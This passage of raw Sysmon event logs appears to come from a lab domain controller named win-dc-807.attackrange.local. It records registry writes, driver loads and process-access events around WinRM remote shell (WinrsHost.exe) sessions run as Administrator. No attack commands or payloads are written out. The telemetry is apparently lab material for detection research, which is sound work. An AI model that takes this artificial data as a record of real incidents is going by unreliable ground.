NT\CurrentVersion\NetworkList\Profiles\{719FB519-2998-4038-9070-C096A1BDBCC9}\CategoryDWORD (0x00000002) 13241300x80000000000000002495Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-SetValue2020-11-03 15:51:40.940{D28789B6-7C64-5FA1-1300-000000008801}1224C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{719FB519-2998-4038-9070-C096A1BDBCC9}\ManagedDWORD (0x00000001) 13241300x80000000000000002494Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-SetValue2020-11-03 15:51:40.940{D28789B6-7C64-5FA1-1300-000000008801}1224C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{719FB519-2998-4038-9070-C096A1BDBCC9}\Descriptionattackrange.local 13241300x80000000000000002493Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-SetValue2020-11-03 15:51:40.940{D28789B6-7C64-5FA1-1300-000000008801}1224C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{719FB519-2998-4038-9070-C096A1BDBCC9}\ProfileNameattackrange.local 10341000x80000000000000002492Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.893{D28789B6-7C64-5FA1-1500-000000008801}13362624C:\Windows\system32\svchost.exe{D28789B6-7C8C-5FA1-7900-000000008801}4256C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000002491Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.893{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C8C-5FA1-7900-000000008801}4256C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 644600x80000000000000002490Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:58.191C:\Windows\System32\drivers\xencrsh.sysMD5=8498E8240422067AF19398BA0C9E71BD,SHA256=8763BD78E6D2A5C4974EE2C917069C212FA6B5E138B1DFAF3D923EC7BDA8CCE0,IMPHASH=5A51E368D0D191BA922C89AD12551EF4trueAmazon Web Services, Inc.Valid 644600x80000000000000002489Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:57.566C:\Windows\System32\drivers\xennet.sysMD5=7E6757CF81A305710B036475BCEDBC30,SHA256=9A5D7EAC527B6CDEC891C4A5C49FAF8599A1714078960DB87A7D72B0888A8987,IMPHASH=73F39C491797C6F3DFFBBE92FB638F34trueAmazon Web Services, Inc.Valid 10341000x80000000000000002488Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.878{D28789B6-7C8C-5FA1-7A00-000000008801}42444312C:\Windows\system32\conhost.exe{D28789B6-7C8C-5FA1-7900-000000008801}4256C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002487Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.878{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7C8C-5FA1-7A00-000000008801}4244C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002486Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.878{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002485Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.878{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002484Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.878{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002483Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.878{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002482Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.878{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002481Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.878{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002480Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.878{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002479Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.878{D28789B6-7C64-5FA1-1500-000000008801}13361668C:\Windows\system32\svchost.exe{D28789B6-7C8C-5FA1-7700-000000008801}4164C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000002478Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.878{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002477Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.878{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002476Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.878{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7C8C-5FA1-7900-000000008801}4256C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002475Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.862{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C8C-5FA1-7900-000000008801}4256C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002474Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.877{D28789B6-7C8C-5FA1-7900-000000008801}4256C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{D28789B6-7C8C-5FA1-5039-040000000000}0x439500HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{D28789B6-7C64-5FA1-0C00-000000008801}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000002473Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.862{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C8C-5FA1-7700-000000008801}4164C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002472Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.847{D28789B6-7C8C-5FA1-7800-000000008801}41484232C:\Windows\system32\conhost.exe{D28789B6-7C8C-5FA1-7700-000000008801}4164C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002471Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.847{D28789B6-7C64-5FA1-1500-000000008801}13362264C:\Windows\system32\svchost.exe{D28789B6-7C8C-5FA1-7500-000000008801}5104C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000002470Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.847{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7C8C-5FA1-7800-000000008801}4148C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002469Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.847{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002468Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.847{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002467Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.847{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002466Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.847{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002465Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 